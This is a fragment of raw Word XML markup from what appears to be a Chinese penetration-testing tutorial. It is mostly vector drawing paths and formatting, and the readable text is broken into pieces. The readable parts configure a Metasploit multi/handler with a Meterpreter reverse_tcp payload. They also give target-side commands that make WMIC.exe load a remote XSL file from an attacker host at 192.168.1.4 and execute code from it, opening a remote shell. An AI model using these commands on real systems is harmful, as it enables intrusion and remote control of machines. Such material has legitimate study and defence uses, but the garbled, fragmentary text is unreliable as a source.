2,1300,5540,1300,5539,1300,5538,1300,5536,1300,5535,1300,5533,1300,5531,1300,5530,1300,5528,1300,5527,1300,5525,1300,5523,1300,5521,1300,5520,1300,5518,1300,5516,1300,5514,1300,5512,1300,5510,1300,5508,1300,5506,1300,5503,1300,5501,1300,5499,1300,5497,1300,5494,1300,5492,1300,5490,1300,5487,1300,5485,1300,5482,1300,5479,1300,5477,1300,5474,1300,5471,1300,5468,1300,5466,1300,5463,1300,5460,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1300,5457,1299,5457,1299,5457,1299,5457,1299,5457,1299,5457,1299,5457,1299,5457,1299,5457,1299,5457,1298,5457,1298,5457,1298,5457,1298,5457,1298,5457,1297,5457,1297,5457,1297,5457,1296,5457,1296,5457,1296,5457,1295,5457,1295,5457,1294,5457,1294,5457,1293,5457,1293,5457,1292,5457,1291,5457,1291,5457,1290,5457,1289,5457,1288,5457,1288,5457,1287,5457,1286,5457,1285,5457,1284,5457,1283,5457,1282,5457,1281,5457,1280,5457,1278,5457,1277,5457,1276,5457,1274,5457,1273,5457,1272,5457,1270,5457,1269,5457,1267,5457,1265,5457,1264,5457,1262,5457,1260,5457,1258,5457,1256,5457,1254,5457,1252,5457,1250,5457,1248,5457,1245,5457,1243,5457,1241,5457,1238,5457,1236,5457,1233,5457,1231,5457,1228,5457,1225,5457,1222,5457,1219,5457,1216,5457,1213,5457,1210,5457,1207,5457,1203,5457,1200,5457,1196,5457,1193,5457,1189,5457,1186,5457,1182,5457,1178,5457,1174,5457,1170,5457,1166,5457,1161,5457,1157,5457,1153,5457,1148,5457,1144,5457,1139,5457,1134,5457,1129,5457,1124,5457,1119,5457,1114,5457,1109,5457,1104,5457,1098,5457,1093,5457,1087,5457,1081,5457,1075,5457,1069,5457,1063,5457,1057,5457,1051,5457,1045e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:241.500pt;margin-top:157.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="4830,3150" coordsize="130,250">
        <v:shape style="position:absolute;left:4830;top:3150;width:130;height:250" coordorigin="4830,3150" coordsize="130,250" path="m4856,3161l4856,3161,4856,3161,4856,3161,4856,3161,4856,3161,4856,3161,4856,3161,4856,3161,4856,3161,4856,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4857,3161,4858,3161,4858,3161,4858,3161,4858,3161,4858,3161,4858,3161,4859,3161,4859,3161,4859,3161,4859,3161,4860,3161,4860,3161,4860,3161,4860,3161,4861,3161,4861,3161,4861,3161,4862,3161,4862,3161,4863,3161,4863,3161,4863,3161,4864,3161,4864,3161,4865,3161,4865,3161,4866,3161,4866,3161,4867,3161,4868,3161,4868,3161,4869,3161,4870,3161,4870,3161,4871,3161,4872,3161,4873,3161,4873,3161,4874,3161,4875,3161,4876,3161,4877,3161,4878,3161,4879,3161,4880,3161,4881,3161,4882,3161,4883,3161,4884,3161,4885,3161,4887,3161,4888,3161,4889,3161,4890,3161,4892,3161,4893,3161,4894,3161,4896,3161,4897,3161,4899,3161,4900,3161,4902,3161,4903,3161,4905,3161,4907,3161,4908,3161,4910,3161,4912,3161,4914,3161,4916,3161,4918,3161,4919,3161,4921,3161,4924,3161,4926,3161,4928,3161,4930,3161,4932,3161,4934,3161,4937,3161,4939,3161,4941,3161,4944,3161,4946,3161,4949,3161,4951,3161,4954,3161,4957,3161,4959,3161,4962,3161,4965,3161,4968,3161,4971,3161,4974,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3161,4977,3162,4977,3162,4977,3162,4977,3162,4977,3162,4977,3163,4977,3163,4977,3163,4977,3164,4977,3164,4977,3164,4977,3165,4977,3165,4977,3166,4977,3166,4977,3167,4977,3167,4977,3168,4977,3168,4977,3169,4977,3170,4977,3170,4977,3171,4977,3172,4977,3173,4977,3173,4977,3174,4977,3175,4977,3176,4977,3177,4977,3178,4977,3180,4977,3181,4977,3182,4977,3183,4977,3184,4977,3186,4977,3187,4977,3189,4977,3190,4977,3192,4977,3193,4977,3195,4977,3197,4977,3198,4977,3200,4977,3202,4977,3204,4977,3206,4977,3208,4977,3210,4977,3213,4977,3215,4977,3217,4977,3219,4977,3222,4977,3224,4977,3227,4977,3230,4977,3232,4977,3235,4977,3238,4977,3241,4977,3244,4977,3247,4977,3250,4977,3254,4977,3257,4977,3260,4977,3264,4977,3267,4977,3271,4977,3275,4977,3278,4977,3282,4977,3286,4977,3290,4977,3295,4977,3299,4977,3303,4977,3307,4977,3312,4977,3317,4977,3321,4977,3326,4977,3331,4977,3336,4977,3341,4977,3346,4977,3351,4977,3357,4977,3362,4977,3368,4977,3373,4977,3379,4977,3385,4977,3391,4977,3397,4977,3403,4977,3409,4977,3416,4977,3416,4977,3416,4977,3416,4977,3416,4977,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4976,3416,4975,3416,4975,3416,4975,3416,4975,3416,4975,3416,4975,3416,4974,3416,4974,3416,4974,3416,4974,3416,4973,3416,4973,3416,4973,3416,4973,3416,4972,3416,4972,3416,4972,3416,4971,3416,4971,3416,4970,3416,4970,3416,4970,3416,4969,3416,4969,3416,4968,3416,4968,3416,4967,3416,4966,3416,4966,3416,4965,3416,4965,3416,4964,3416,4963,3416,4963,3416,4962,3416,4961,3416,4960,3416,4960,3416,4959,3416,4958,3416,4957,3416,4956,3416,4955,3416,4954,3416,4953,3416,4952,3416,4951,3416,4950,3416,4949,3416,4948,3416,4946,3416,4945,3416,4944,3416,4943,3416,4941,3416,4940,3416,4939,3416,4937,3416,4936,3416,4934,3416,4933,3416,4931,3416,4930,3416,4928,3416,4926,3416,4925,3416,4923,3416,4921,3416,4919,3416,4917,3416,4915,3416,4913,3416,4911,3416,4909,3416,4907,3416,4905,3416,4903,3416,4901,3416,4899,3416,4896,3416,4894,3416,4892,3416,4889,3416,4887,3416,4884,3416,4882,3416,4879,3416,4876,3416,4874,3416,4871,3416,4868,3416,4865,3416,4862,3416,4859,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3416,4856,3415,4856,3415,4856,3415,4856,3415,4856,3415,4856,3415,4856,3415,4856,3415,4856,3415,4856,3414,4856,3414,4856,3414,4856,3414,4856,3413,4856,3413,4856,3413,4856,3412,4856,3412,4856,3412,4856,3411,4856,3411,4856,3410,4856,3410,4856,3409,4856,3409,4856,3408,4856,3407,4856,3407,4856,3406,4856,3405,4856,3405,4856,3404,4856,3403,4856,3402,4856,3401,4856,3400,4856,3399,4856,3398,4856,3397,4856,3396,4856,3394,4856,3393,4856,3392,4856,3391,4856,3389,4856,3388,4856,3386,4856,3385,4856,3383,4856,3381,4856,3380,4856,3378,4856,3376,4856,3374,4856,3372,4856,3370,4856,3368,4856,3366,4856,3364,4856,3362,4856,3359,4856,3357,4856,3354,4856,3352,4856,3349,4856,3347,4856,3344,4856,3341,4856,3338,4856,3335,4856,3332,4856,3329,4856,3326,4856,3323,4856,3319,4856,3316,4856,3313,4856,3309,4856,3305,4856,3302,4856,3298,4856,3294,4856,3290,4856,3286,4856,3282,4856,3278,4856,3273,4856,3269,4856,3264,4856,3260,4856,3255,4856,3250,4856,3245,4856,3240,4856,3235,4856,3230,4856,3225,4856,3220,4856,3214,4856,3209,4856,3203,4856,3197,4856,3191,4856,3185,4856,3179,4856,3173,4856,3167,4856,3161e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:313.500pt;margin-top:157.500pt;width:6.500pt;height:12.500pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="6270,3150" coordsize="130,250">
        <v:shape style="position:absolute;left:6270;top:3150;width:130;height:250" coordorigin="6270,3150" coordsize="130,250" path="m6297,3161l6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6297,3161,6298,3161,6298,3161,6298,3161,6298,3161,6298,3161,6298,3161,6298,3161,6298,3161,6298,3161,6298,3161,6299,3161,6299,3161,6299,3161,6299,3161,6299,3161,6300,3161,6300,3161,6300,3161,6300,3161,6300,3161,6301,3161,6301,3161,6301,3161,6302,3161,6302,3161,6302,3161,6303,3161,6303,3161,6304,3161,6304,3161,6305,3161,6305,3161,6306,3161,6306,3161,6307,3161,6307,3161,6308,3161,6308,3161,6309,3161,6310,3161,6310,3161,6311,3161,6312,3161,6313,3161,6313,3161,6314,3161,6315,3161,6316,3161,6317,3161,6318,3161,6319,3161,6320,3161,6321,3161,6322,3161,6323,3161,6324,3161,6325,3161,6326,3161,6327,3161,6328,3161,6330,3161,6331,3161,6332,3161,6334,3161,6335,3161,6336,3161,6338,3161,6339,3161,6341,3161,6342,3161,6344,3161,6346,3161,6347,3161,6349,3161,6351,3161,6353,3161,6354,3161,6356,3161,6358,3161,6360,3161,6362,3161,6364,3161,6366,3161,6368,3161,6371,3161,6373,3161,6375,3161,6377,3161,6380,3161,6382,3161,6384,3161,6387,3161,6389,3161,6392,3161,6395,3161,6397,3161,6400,3161,6403,3161,6406,3161,6408,3161,6411,3161,6414,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3161,6417,3162,6417,3162,6417,3162,6417,3162,6417,3162,6417,3163,6417,3163,6417,3163,6417,3164,6417,3164,6417,3164,6417,3165,6417,3165,6417,3166,6417,3166,6417,3167,6417,3167,6417,3168,6417,3168,6417,3169,6417,3170,6417,3170,6417,3171,6417,3172,6417,3173,6417,3173,6417,3174,6417,3175,6417,3176,6417,3177,6417,3178,6417,3180,6417,3181,6417,3182,6417,3183,6417,3184,6417,3186,6417,3187,6417,3189,6417,3190,6417,3192,6417,3193,6417,3195,6417,3197,6417,3198,6417,3200,6417,3202,6417,3204,6417,3206,6417,3208,6417,3210,6417,3213,6417,3215,6417,3217,6417,3219,6417,3222,6417,3224,6417,3227,6417,3230,6417,3232,6417,3235,6417,3238,6417,3241,6417,3244,6417,3247,6417,3250,6417,3254,6417,3257,6417,3260,6417,3264,6417,3267,6417,3271,6417,3275,6417,3278,6417,3282,6417,3286,6417,3290,6417,3295,6417,3299,6417,3303,6417,3307,6417,3312,6417,3317,6417,3321,6417,3326,6417,3331,6417,3336,6417,3341,6417,3346,6417,3351,6417,3357,6417,3362,6417,3368,6417,3373,6417,3379,6417,3385,6417,3391,6417,3397,6417,3403,6417,3409,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6417,3416,6416,3416,6416,3416,6416,3416,6416,3416,6416,3416,6416,3416,6416,3416,6415,3416,6415,3416,6415,3416,6415,3416,6415,3416,6414,3416,6414,3416,6414,3416,6414,3416,6413,3416,6413,3416,6413,3416,6412,3416,6412,3416,6412,3416,6411,3416,6411,3416,6410,3416,6410,3416,6409,3416,6409,3416,6408,3416,6408,3416,6407,3416,6407,3416,6406,3416,6405,3416,6405,3416,6404,3416,6403,3416,6403,3416,6402,3416,6401,3416,6400,3416,6399,3416,6399,3416,6398,3416,6397,3416,6396,3416,6395,3416,6394,3416,6393,3416,6392,3416,6391,3416,6390,3416,6388,3416,6387,3416,6386,3416,6385,3416,6383,3416,6382,3416,6381,3416,6379,3416,6378,3416,6376,3416,6375,3416,6373,3416,6372,3416,6370,3416,6369,3416,6367,3416,6365,3416,6364,3416,6362,3416,6360,3416,6358,3416,6356,3416,6354,3416,6352,3416,6350,3416,6348,3416,6346,3416,6344,3416,6342,3416,6339,3416,6337,3416,6335,3416,6332,3416,6330,3416,6327,3416,6325,3416,6322,3416,6320,3416,6317,3416,6314,3416,6312,3416,6309,3416,6306,3416,6303,3416,6300,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3416,6297,3415,6297,3415,6297,3415,6297,3415,6297,3415,6297,3415,6297,3415,6297,3415,6297,3415,6297,3414,6297,3414,6297,3414,6297,3414,6297,3413,6297,3413,6297,3413,6297,3412,6297,3412,6297,3412,6297,3411,6297,3411,6297,3410,6297,3410,6297,3409,6297,3409,6297,3408,6297,3407,6297,3407,6297,3406,6297,3405,6297,3405,6297,3404,6297,3403,6297,3402,6297,3401,6297,3400,6297,3399,6297,3398,6297,3397,6297,3396,6297,3394,6297,3393,6297,3392,6297,3391,6297,3389,6297,3388,6297,3386,6297,3385,6297,3383,6297,3381,6297,3380,6297,3378,6297,3376,6297,3374,6297,3372,6297,3370,6297,3368,6297,3366,6297,3364,6297,3362,6297,3359,6297,3357,6297,3354,6297,3352,6297,3349,6297,3347,6297,3344,6297,3341,6297,3338,6297,3335,6297,3332,6297,3329,6297,3326,6297,3323,6297,3319,6297,3316,6297,3313,6297,3309,6297,3305,6297,3302,6297,3298,6297,3294,6297,3290,6297,3286,6297,3282,6297,3278,6297,3273,6297,3269,6297,3264,6297,3260,6297,3255,6297,3250,6297,3245,6297,3240,6297,3235,6297,3230,6297,3225,6297,3220,6297,3214,6297,3209,6297,3203,6297,3197,6297,3191,6297,3185,6297,3179,6297,3173,6297,3167,6297,3161e x" fillcolor="#fefefe" stroke="f">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:471.600pt;width:467.400pt;height:276.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId9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8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auto"/>
        <w:ind w:left="1705" w:right="5151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Module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exploit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multi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/</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="0076a9"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>handler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4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4791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7</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="25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8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38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Payload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options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windows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meterpreter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reverse_tcp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)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10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Current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Setting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Required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Description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5"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:spacing w:val="5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>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‐‐‐‐‐‐‐‐‐‐‐‐‐‐‐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6e7f8f"/>
          <w:spacing w:val="6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐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e7f8f"/>
          <w:spacing w:val="4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐‐‐‐‐‐‐‐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22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EXITFUNC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process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Exit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technique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Accepted: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659800"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>''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seh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thread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3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proce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ss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none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LHOST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192.168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color w:val="980053"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.4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address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an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interface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may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be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specifi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pacing w:val="2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>ed</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="989898"/>
          <w:spacing w:val="3"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="141" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="346" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="6261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15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LPORT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53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yes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The</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="1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listen</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="20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port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16</w:t>
      </w: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17</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="124" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="331" w:lineRule="auto"/>
        <w:ind w:left="1705" w:right="7942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Exploit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target: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Id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Name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3"/>
        </w:rPr>
        <w:t>   </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas" w:eastAsia="Consolas"/>
          <w:color w:val="6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐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6e7f8f"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>‐‐‐‐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7582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Wildcard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Target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23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靶</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>机执行：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8.874pt;margin-top:112.874pt;width:4.125pt;height:31.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,2257" coordsize="82,622">
        <v:shape style="position:absolute;left:1177;top:2257;width:82;height:622" coordorigin="1177,2257" coordsize="82,622" path="m1217,2260l1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2260,1217,2261,1217,2261,1217,2261,1217,2261,1217,2261,1217,2262,1217,2262,1217,2262,1217,2263,1217,2263,1217,2263,1217,2264,1217,2264,1217,2265,1217,2266,1217,2266,1217,2267,1217,2268,1217,2269,1217,2270,1217,2271,1217,2272,1217,2273,1217,2274,1217,2275,1217,2277,1217,2278,1217,2280,1217,2281,1217,2283,1217,2285,1217,2287,1217,2288,1217,2290,1217,2293,1217,2295,1217,2297,1217,2300,1217,2302,1217,2305,1217,2307,1217,2310,1217,2313,1217,2316,1217,2319,1217,2323,1217,2326,1217,2330,1217,2333,1217,2337,1217,2341,1217,2345,1217,2349,1217,2354,1217,2358,1217,2363,1217,2367,1217,2372,1217,2377,1217,2382,1217,2388,1217,2393,1217,2399,1217,2404,1217,2410,1217,2417,1217,2423,1217,2429,1217,2436,1217,2443,1217,2449,1217,2457,1217,2464,1217,2471,1217,2479,1217,2487,1217,2495,1217,2503,1217,2511,1217,2520,1217,2529,1217,2538,1217,2547,1217,2556,1217,2566,1217,2575,1217,2585,1217,2595,1217,2606,1217,2616,1217,2627,1217,2638,1217,2649,1217,2661,1217,2673,1217,2684,1217,2697,1217,2709,1217,2721,1217,2734,1217,2747,1217,2761,1217,2774,1217,2788,1217,2802,1217,2816,1217,2831,1217,2845,1217,2860e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:group style="position:absolute;margin-left:58.874pt;margin-top:670.874pt;width:4.125pt;height:16.125pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="1177,13417" coordsize="82,322">
        <v:shape style="position:absolute;left:1177;top:13417;width:82;height:322" coordorigin="1177,13417" coordsize="82,322" path="m1217,13426l1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13426,1217,13427,1217,13427,1217,13427,1217,13427,1217,13427,1217,13428,1217,13428,1217,13428,1217,13429,1217,13429,1217,13429,1217,13430,1217,13430,1217,13431,1217,13431,1217,13432,1217,13432,1217,13433,1217,13433,1217,13434,1217,13435,1217,13436,1217,13436,1217,13437,1217,13438,1217,13439,1217,13440,1217,13441,1217,13442,1217,13443,1217,13444,1217,13445,1217,13447,1217,13448,1217,13449,1217,13451,1217,13452,1217,13454,1217,13455,1217,13457,1217,13459,1217,13461,1217,13462,1217,13464,1217,13466,1217,13468,1217,13470,1217,13472,1217,13475,1217,13477,1217,13479,1217,13482,1217,13484,1217,13487,1217,13490,1217,13492,1217,13495,1217,13498,1217,13501,1217,13504,1217,13507,1217,13510,1217,13514,1217,13517,1217,13520,1217,13524,1217,13528,1217,13531,1217,13535,1217,13539,1217,13543,1217,13547,1217,13551,1217,13556,1217,13560,1217,13564,1217,13569,1217,13574,1217,13578,1217,13583,1217,13588,1217,13593,1217,13599,1217,13604,1217,13609,1217,13615,1217,13620,1217,13626,1217,13632,1217,13638,1217,13644,1217,13650,1217,13656,1217,13663,1217,13669,1217,13676,1217,13683,1217,13690,1217,13697,1217,13704,1217,13711,1217,13718,1217,13726e" filled="f" stroked="t" strokeweight="2.251pt" strokecolor="#e7e7e7">
          <v:path arrowok="t"/>
        </v:shape>
      </v:group>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:162.600pt;width:467.400pt;height:44.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId10" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:225.600pt;width:467.400pt;height:107.400pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId11" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:393.600pt;width:296.399pt;height:105.600pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId12" o:title=""/>
      </v:shape>
    </w:pict>
    <w:pict>
      <v:shape style="position:absolute;margin-left:54.600pt;margin-top:538.799pt;width:431.400pt;height:112.200pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:0" type="#_x0000_t75">
        <v:imagedata r:id="rId13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1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="35"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>7：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="200" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="295" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="263" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="5409" w:firstLine="0"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>C:\Windows\SysWOW64\wbem\WMIC.exe</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="26"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="18"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="17"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>get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6"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/format:"http:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-5"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>//192.168.1.4/Micropoor.xsl"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30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21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52"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="26"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2003：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8" w:lineRule="exact"/>
        <w:ind w:left="0" w:right="0"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="0" w:after="0" w:line="243" w:lineRule="auto"/>
        <w:ind w:left="1495" w:right="0" w:firstLine="0"/>
      </w:pP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WMIC.exe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1"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>os</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t> </w:t>
      </w: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get</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:spacing w:val="-1"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:cs="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:spacing w:val="-2"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>/format:"http://192.168.1.4/Micropoor_2003.xsl"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278.115pt;width:0.0pt;height:563.885pt;mso-position-horizontal-relative:page;mso-position-vertical-relative:page;z-index:-10" coordorigin="10402,5562" coordsize="0,11277">
